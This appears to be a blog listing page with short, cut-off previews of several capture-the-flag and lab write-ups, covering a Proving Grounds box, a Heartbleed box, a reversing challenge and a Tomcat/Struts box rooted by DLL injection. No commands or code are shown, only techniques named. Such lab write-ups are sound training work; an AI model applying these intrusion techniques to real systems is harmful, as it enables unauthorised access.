I decided to take a break from Hack the box and make my trip to Off-Sec Proving Grounds. Now Off-Sec proving grounds is nothing special, it just has VulnHub machines hosted. One thing is that it is convenient that you don’t have to download and install VMs which in my case is a pain (I have low storage lel). Cyber Sploit was perhaps one of the most easiest boxes I have ever done. I rooted the box in a little under 15 minutes so it was a indeed a nice warm up.
One thing which I did not like…
This a notes like write-up I am posting about the HTB boxes I managed to compromise by myself. Preparing for “a certain” course, these kind of boxes are really helpful in getting experience. Lets jump in!
This box is all about deep website enumeration and finding the correct CVE. We start off by having very little information about any of the services running in the box, gradually enumerating almost everything and piecing together vital piece of information we finally get a foothold. Funny thing is, the foothold itself is root so no need for lateral-movement and privilege escalation (yeet!)
So, I managed to solve the retired Valentine box from Hack the Box and decided to write a write-up about. You can always return to your write up if you forget something, its like a notes taking! Lets begin!
The box teaches us how to detect and exploit the “Heartbleed” vulnerability which is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. More on that on this site. We get a weired looking hex string which actually is the…
A week back, one of my seniors published a series of three CTF challenges from Cryptography, Reversing and Forensics. This write up focuses on the Reversing challenge.
I always like to perform some easy tests on the binary which can be a easy win or at least give insight to what’s going on inside without having to delve in deeper for now.
I ran file command to see the information about the binary, it displayed the following:
One thing I noticed is that the Binary is “not stripped” which means we can debug it easily and disassemble the functions…
The box was pretty fun with some rabbit holes which can really frustrate someone (personal experience) once the vulnerability has been exposed things do not go easy from there as the boxes itself has many protections in it. I am going to show you how I owned this box. So basically the “http” running Apache Tomcat was vulnerable to Apache struts vulnerability, leveraging that we get credential information of a user, ssh in and then do a DLL Injection Privilege Escalation to get root.
The first enumeration is starting an nmap scan and brute forcing website directories. For this…